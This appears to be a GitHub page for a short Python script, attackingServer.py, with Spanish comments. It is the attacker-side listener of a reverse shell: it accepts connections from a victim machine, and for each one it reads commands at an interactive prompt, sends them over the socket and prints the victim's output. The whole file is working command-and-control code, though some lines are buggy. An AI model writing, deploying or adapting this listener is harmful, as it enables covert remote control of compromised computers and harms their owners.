-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathattackingServer.py
54 lines (47 loc) · 1.71 KB
/
attackingServer.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from os import kill
import threading
import socket
import sys
# ! Fin del comando
FIN_COMANDO = b'#00#'
def desplegar_salida_comando(salida):
# ! Vienen en binario, espera la respuesta del servidor y despliega la salida
salida = salida.decode('UTF-8') # ! str
print(salida)
def leer_respuesta(socket):
# ! Lee el canal de comunicacion del servidor y reconstruye el comando
salida = socket.recv(4096)
while not salida.endswith(FIN_COMANDO):
salida += salida.recv(4096)
quitar_caracteres = len(FIN_COMANDO)
return salida[:-quitar_caracteres]
def mandar_comando(comando, socket):
# ! Esperamos la respuesta del cliente(victima) y la retornamos
comando = comando.encode('UTF-8') # * Convertimos a binario
comando += FIN_COMANDO
socket.send(comando)
#print(comando)
salida = leer_respuesta(socket)
return salida
def leer_comandos(socket):
#print(socket)
comando = ''
print('Welcome to Shell!')
print('Start to write commands!')
while comando != b'exit':
comando = input('$> ') # ! Lee un str NO un binario
respuesta = mandar_comando(comando, socket)
desplegar_salida_comando(respuesta)
def inicializar_servidor(puerto):
# * Creamos el socket
servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
servidor.bind(('', int(puerto)))
servidor.listen(5) # * Peticiones simultaneas
while True:
cliente, addr = servidor.accept()
print('Connection received from {}'.format(addr))
hilo_comandos = threading.Thread(target=leer_comandos, args=(cliente,))
hilo_comandos.start()
if __name__ == '__main__':
puerto = sys.argv[1] # * Pasamos el puerto
socket = inicializar_servidor(puerto)